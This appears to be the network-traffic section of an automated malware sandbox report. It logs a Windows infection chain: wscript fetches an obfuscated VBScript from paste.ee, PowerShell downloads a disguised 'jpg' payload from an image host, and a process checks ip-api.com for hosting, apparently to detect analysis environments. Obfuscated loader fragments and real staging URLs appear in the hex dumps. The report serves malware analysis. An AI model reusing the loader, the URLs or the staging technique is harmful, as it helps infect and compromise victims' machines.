                                                                                  Data Ascii: AwBCAgBCAQBCAABCAwACAgACAQACAAACgdgRYABOUQHBIAAG4gDBIAAFkhEAAABOkIgS4gAAcQhAKRgAKRAAgAAeEQfSUBAeEQfSURABAxDAHYEGQAwBGhDBAgBO4gDdIAAGggDO4gDEAwBIAgHdARACEAEJAAAwDABAAwDAQAAAAA8EAAAA8ABAAAEAQAAAQAAEAAACAABAAAAARAtBGhBEAAAD8OBwGYEGQQBdUQHF0RADASC


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449734208.95.112.1806160C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Apr 24, 2024 06:54:18.918140888 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                  Host: ip-api.com
                                                                                  Connection: Keep-Alive
                                                                                  Apr 24, 2024 06:54:19.078073025 CEST175INHTTP/1.1 200 OK
                                                                                  Date: Wed, 24 Apr 2024 04:54:18 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 6
                                                                                  Access-Control-Allow-Origin: *
                                                                                  X-Ttl: 60
                                                                                  X-Rl: 44
                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                  Data Ascii: false


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449730104.21.84.674436164C:\Windows\System32\wscript.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-24 04:54:08 UTC319OUTGET /d/gK5wA HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-ch
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: paste.ee
                                                                                  Connection: Keep-Alive
                                                                                  2024-04-24 04:54:09 UTC1244INHTTP/1.1 200 OK
                                                                                  Date: Wed, 24 Apr 2024 04:54:08 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=2592000
                                                                                  strict-transport-security: max-age=63072000
                                                                                  x-frame-options: DENY
                                                                                  x-content-type-options: nosniff
                                                                                  x-xss-protection: 1; mode=block
                                                                                  content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyc46gVFXf%2FDURqJGk%2BmAtqPexvMk0WTCPEg6kVXmGWJ3UvrJBwAv2%2FwAsOcijXIsA5SmgOPJ%2B6F%2BiHJ7B5xpGJbW%2FaRDYdFpIaYiP8CZ%2Bqcbo8N236ln5%2FfcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 87937e5fcbd87d1f-LAX
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-24 04:54:09 UTC125INData Raw: 33 34 30 39 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 70 69 74 68 65 63 6f 20 2c 20 61 63 68 61 76 61 73 63 61 64 6f 20 2c 20 65 6e 74 65 72 72 61 72 20 2c 20 62 65 78 69 67 61 6c 20 2c 20 65 78 63 75 72 73 61 72 20 2c 20 43 61 6d 61 20 2c 20 65 78 63 75 72 73 61 72 31 0d 0a 20 20 20 20 20 61 63 68 61 76 61 73 63 61 64 6f 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 65 6e 74 65
                                                                                  Data Ascii: 3409 dim pitheco , achavascado , enterrar , bexigal , excursar , Cama , excursar1 achavascado = " " ente
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 72 72 61 72 20 20 3d 20 22 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44
                                                                                  Data Ascii: rrar = "" & bexigal & achavascado & bexigal & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHID
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f
                                                                                  Data Ascii: eGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & bexigal & achavascado & bexigal & "gBvDgTreHIDgTre" & bexigal & achavascado
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44
                                                                                  Data Ascii: CgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & bexigal & achavascado & bexigal & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & bexigal & achavascado & bexigal & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGID
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 33 44 67 54 72 65 44 67 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 34 44 67 54 72 65 43 63 44 67 54 72 65 4b 51 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 51 67 42 35 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 7a 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 45 51 44 67 54 72 65 62 77 42 33 44 67 54 72 65 47 34 44 67 54 72 65 62 44 67 54 72 65 42 76 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26
                                                                                  Data Ascii: gTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTre" & bexigal & achavascado & bexigal & "QBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTre" & bexigal &
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 65 55 67 42 55 44 67 54 72 65 44 34 44 67 54 72 65 50 67 44 67 54 72 65 6e 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 46 44 67 54 72 65 45 34 44 67 54 72 65 52 44 67 54 72 65 44 67 54 72 65 2b 44 67 54 72 65 44 34 44 67 54 72 65 4a 77 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67
                                                                                  Data Ascii: eUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDg
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 44 67 54 72 65 6b 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 77 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 34 44 67 54 72 65 43 6b 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54
                                                                                  Data Ascii: DgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTre" & bexigal & achavascado & bexigal & "wB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & bexigal & achavascado & bexigal & "QB4DgTreCkDgTreIDgTreB7DgTreCDgT
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 69 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 4d 44 67 54 72 65 62 77 42 74 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 51 67 42 35 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 7a 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 46 73 44 67 54
                                                                                  Data Ascii: CDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTre" & bexigal & achavascado & bexigal & "QBzDgTreCDgTreDgTrePQDgTregDgTreFsDgT
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 74 44 67 54 72 65 47 49 44 67 54 72 65 62 44 67 54 72 65 42 35 44 67 54 72 65 43 34 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 56 44 67 54 72 65 42 35 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 44 67 54 72 65 6f 44 67 54 72 65 43 63 44 67 54 72 65 55 44 67 54 72 65 42 53 44 67 54 72 65 45 38 44 67 54 72 65 53 67 42 46 44 67 54 72 65 46 51 44 67 54 72 65 54 77 42 42 44 67 54 72 65 46 55 44 67 54 72 65 56 44 67 54 72 65 42 50 44 67 54 72 65 45 30 44 67 54 72 65 51 51 42 44 44 67 54 72 65
                                                                                  Data Ascii: re" & bexigal & achavascado & bexigal & "QBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTre" & bexigal & achavascado & bexigal & "QDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTre
                                                                                  2024-04-24 04:54:09 UTC1369INData Raw: 67 54 72 65 47 51 44 67 54 72 65 62 77 44 67 54 72 65 6e 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 63 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 64 67 42 68 44 67 54 72 65 47 51 44 67 54 72 65 62 77 44 67 54 72 65 6e 44 67 54 72 65 43 77 44 67 54 72 65 4a 77 42 42 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 55 44 67 54 72 65 42 79 44 67 54 72
                                                                                  Data Ascii: gTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTre" & bexigal & achavascado & bexigal & "DgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTre" & bexigal & achavascado & bexigal & "DgTreBJDgTreG4DgTreUDgTreByDgTr


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449731104.21.45.1384433744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-24 04:54:12 UTC120OUTGET /images/004/760/043/full/new_image.jpg?1711287887 HTTP/1.1
                                                                                  Host: uploaddeimagens.com.br
                                                                                  Connection: Keep-Alive
                                                                                  2024-04-24 04:54:12 UTC836INHTTP/1.1 200 OK
                                                                                  Date: Wed, 24 Apr 2024 04:54:12 GMT
                                                                                  Content-Type: image/jpeg
                                                                                  Content-Length: 118736
                                                                                  Connection: close
                                                                                  Cache-Control: public, max-age=31536000
                                                                                  Content-Disposition: inline; filename="new_image.jpg"
                                                                                  Expires: Sun, 31 Mar 2024 14:09:54 GMT
                                                                                  X-Request-Id: VhtzpCqlsJ85aNMjBRH78
                                                                                  X-Cache-Status: HIT
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 2043757
                                                                                  Last-Modified: Sun, 31 Mar 2024 13:11:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JI%2FVK2%2BqAUxgQxG047nCtOaVy04AYgfC0ngIlD2AmN3ENcSfeMm%2F2l3SXYqa9j1MAPCDXvwrkVTkCncADGPCOeDpNhazIz%2F9ZyApnu7tPFWNiuaXt81Sg23NafLWUkJ3WxWgbzziAkUd"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 87937e788b307ca7-LAX
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-24 04:54:12 UTC533INData Raw: ff d8 ff e1 00 bc 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 d4 03 00 00 03 a0 04 00 01 00 00 00 27 02 00 00 00 00 00 00 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d
                                                                                  Data Ascii: ExifII*V^(ifHH02100100'C%# , #&')*)-0-
                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: ad a5 71 ba ec 76 a7 d7 97 24 c6 c9 39 04 b7 0d e9 e9 4a 24 83 56 08 19 3f 2a 08 22 94 97 03 76 27 de 8e 9a 5c 32 a6 07 94 0a 85 2d 55 8e 24 19 07 60 ab c7 d7 d6 a6 91 40 73 92 7e 94 1c 89 dc 92 34 8c 7a e7 8a 92 29 1c ee 71 a4 d4 76 d6 cd 3c e9 1c 79 2c c4 28 1f 3a b2 43 f0 c5 eb 85 12 18 a3 1c e4 b1 3f 4d a8 13 6b 01 72 70 08 db 6a e2 37 74 e2 46 2a 4e 42 ff 00 97 db de 9e cf f0 8d c4 4a cd 6f 70 1f b9 52 08 c9 f9 d6 0f 86 2e 32 7f 6d 0a 8c 73 83 b1 a0 42 b2 1d 67 63 a7 3f 95 01 d5 2e ee 0e 98 ed db 48 c6 75 0e 4d 5b e5 f8 62 67 8d 51 66 4d f6 72 41 18 fe a2 95 8f 87 3a 97 8f e0 b4 0b a1 06 ce 48 29 8e 36 fe 94 0a 6c ee a6 93 22 52 0c a0 6e 40 c0 23 fa d7 6e c5 8e 5a a4 b2 e9 52 fd ee ed 75 29 36 de 5d 2a 72 ce 73 81 b7 f7 c5 1d 07 47 b8 9e 3f 13 54 51
                                                                                  Data Ascii: qv$9J$V?*"v'\2-U$`@s~4z)qv<y,(:C?Mkrpj7tF*NBJopR.2msBgc?.HuM[bgQfMrA:H)6l"Rn@#nZRu)6]*rsG?TQ
                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: 71 6f 22 99 9b 50 1e 57 dd 7d 08 07 f5 af 12 33 40 2d e7 11 c9 2e a6 04 01 83 93 b7 7a bb 7d 9c 7c 55 73 d1 ba 0f 53 8f a6 4a 22 b8 9f c3 f1 1a 48 c3 82 c0 36 39 f9 d0 7a d7 c5 16 dd 5e f6 ee de c2 d4 c7 1f 4b 95 f1 7a e0 90 ed 1f 3a 47 b1 e0 fc e9 17 52 9d 2d ac 7e 37 82 02 d6 f0 c7 77 66 17 c3 c6 14 2c 11 8c 01 ed 8a af d8 7c 7b d7 5a de 36 ea 32 44 66 24 86 61 10 3a bd 08 c7 15 5a ea ff 00 14 df 5c 47 f1 16 19 63 fb ec b6 ed 20 f0 fb aa 28 18 f4 e2 82 e1 7b f0 b5 8f 5b f8 df a6 c7 20 f0 ad e2 e9 51 5d 34 48 3c b2 9d 78 c3 7e 75 e9 a9 79 3d bd 8b ad ac 7e 32 c4 b8 48 c3 60 10 3b 0a f0 cb 7f 8a fa 8c 1f 12 59 5d 44 d1 eb 3d 31 61 c8 8f 60 a0 8c 6d f4 c5 3e b5 f8 e3 ad 2c 0c 63 8a 12 c5 f9 11 81 b5 07 b1 c3 7f 2b 69 02 4c 9c 6f 9d f1 51 df 5f dc 09 2d 88
                                                                                  Data Ascii: qo"PW}3@-.z}|UsSJ"H69z^Kz:GR-~7wf,|{Z62Df$a:Z\Gc ({[ Q]4H<x~uy=~2H`;Y]D=1a`m>,c+iLoQ_-
                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: 85 ed 4e 6c 7a d5 cc 11 3e 7c 29 1d 87 90 94 07 4f e9 41 6a 85 2d a2 80 f8 b3 eb 24 86 db 23 7d fc bf c2 85 bd 16 e6 36 96 39 c6 72 3f 66 3b fa fd 07 d6 95 ff 00 8e dc ac 83 75 11 32 91 a7 c1 52 55 b8 cf 1f 5a 05 ba b5 da 4a 57 c4 8c 6e 09 3e 0a 93 8f ca 80 bb b7 92 35 13 c5 a5 88 3b 8c f2 28 7b 79 66 8d 84 4b 2b 2b ee 52 39 5b ca e0 8e cd 50 b7 53 9a 51 29 f2 19 1d c8 de 30 34 8f a7 f7 f3 a0 24 9a e0 43 e1 36 97 42 75 04 2b c1 f6 a0 d3 34 a2 f7 c4 91 4c 72 23 00 55 36 60 71 c8 15 64 b7 ff 00 9a 82 16 90 b2 b0 3a b4 e7 7c fb ff 00 4a ab c9 2c c1 53 5e 48 5f c3 a8 6e 07 ce b6 f7 d7 0c 81 4b 93 83 e9 fa fc e8 1e f5 1b 22 d3 24 96 d8 8e 4e 75 46 30 73 df 3e d4 9e 58 a5 6b 87 73 1f 82 f9 21 82 8f 2f bf ca a4 b3 ea 17 73 4e 91 6b 53 e9 91 8e 29 c5 d0 b9 30 39
                                                                                  Data Ascii: Nlz>|)OAj-$#}69r?f;u2RUZJWn>5;({yfK++R9[PSQ)04$C6Bu+4Lr#U6`qd:|J,S^H_nK"$NuF0s>Xks!/sNkS)09
                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: 24 96 ed 73 22 c8 8c a4 65 70 3c bf 4c 7f 1a 06 96 97 4b 3d d4 90 88 ee 21 96 30 09 f1 13 03 7e 30 73 bd 0b f1 1d 93 5c da c9 37 88 ea 60 46 3e 53 f8 c1 c6 41 f6 da b3 a2 41 79 6f 72 e9 71 74 2f 2c ca 12 92 e4 79 48 3c 66 99 f5 28 4c 9d 2a e4 2b 2e 0a 1c ee 3f 8d 07 9e 3d ab bb 12 ce 00 03 ca 0e 4e 07 a6 6b 42 06 7b 63 1e 98 a3 18 21 99 77 2e 09 c8 ce 78 c6 29 c3 59 ce 8a cc 63 6d 03 db 39 f9 62 84 9a 12 63 26 35 00 9f 2e 47 6c fb 50 0d 67 2c 50 db f8 73 d9 da 39 53 92 1a 32 4f e7 9d e8 1b 94 8c cd 27 84 3c 2d ff 00 e9 c6 0b 28 fa fa 53 88 16 dc e8 f1 86 a6 18 07 03 1b f7 15 39 b5 8e 38 72 ea e1 d9 c1 04 1f dd f4 f9 d0 55 09 d1 e5 2d 8c 9e 6b 99 a5 90 20 4c 91 fc ea d3 79 67 6d 24 00 24 0e c4 12 41 1e 99 ff 00 7a 55 73 d3 a5 9a e3 fe 46 06 54 51 fb e3 19
                                                                                  Data Ascii: $s"ep<LK=!0~0s\7`F>SAAyorqt/,yH<f(L*+.?=NkB{c!w.x)Ycm9bc&5.GlPg,Ps9S2O'<-(S98rU-k Lygm$$AzUsFTQ
                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: f8 ce e4 0e 32 19 79 07 d6 8b bd 64 86 22 91 ae a6 52 02 14 39 20 1e 73 b5 04 d2 96 5b 69 20 02 44 c9 d5 be c4 7a d0 37 b5 b4 59 23 79 4e 58 ae c0 67 83 eb 42 cb a4 68 31 af e3 6f 37 b5 6a 6e b0 dd 3f a5 48 f2 af 9c 7e 14 51 96 c7 bf a5 21 5f 8a 2d 56 42 de 0c 84 1e 54 7f 1a 07 9d 52 35 3e 7d 00 33 0e 01 c6 00 e6 84 b8 b6 28 53 51 ca 91 c9 3b 7d 6a 38 3a a4 5d 43 c5 9a 29 4f 8b 90 3c 37 d8 fb ed 47 39 f1 e3 21 0e a4 43 b9 23 18 c5 02 88 94 7d fd b2 9a bb f3 80 68 b3 6d 10 bb 52 02 bc 4c 71 b6 dc e4 9d 8d 64 b7 36 89 d4 56 3d 1e 2e a5 1e 64 db 4f f7 9a 9f c0 92 41 a6 28 34 30 05 81 27 27 e7 9a 00 26 81 60 b9 f0 d3 22 37 3b 2f 61 52 3b 14 66 c0 d9 54 65 89 f5 a3 a5 88 cf 12 cb 30 50 ea b9 27 3c 9f 51 40 dd 59 45 78 af ac 9c 46 01 24 1c 77 a0 1c 5d 22 eb f1
                                                                                  Data Ascii: 2yd"R9 s[i Dz7Y#yNXgBh1o7jn?H~Q!_-VBTR5>}3(SQ;}j8:]C)O<7G9!C#}hmRLqd6V=.dOA(40''&`"7;/aR;fTe0P'<Q@YExF$w]"
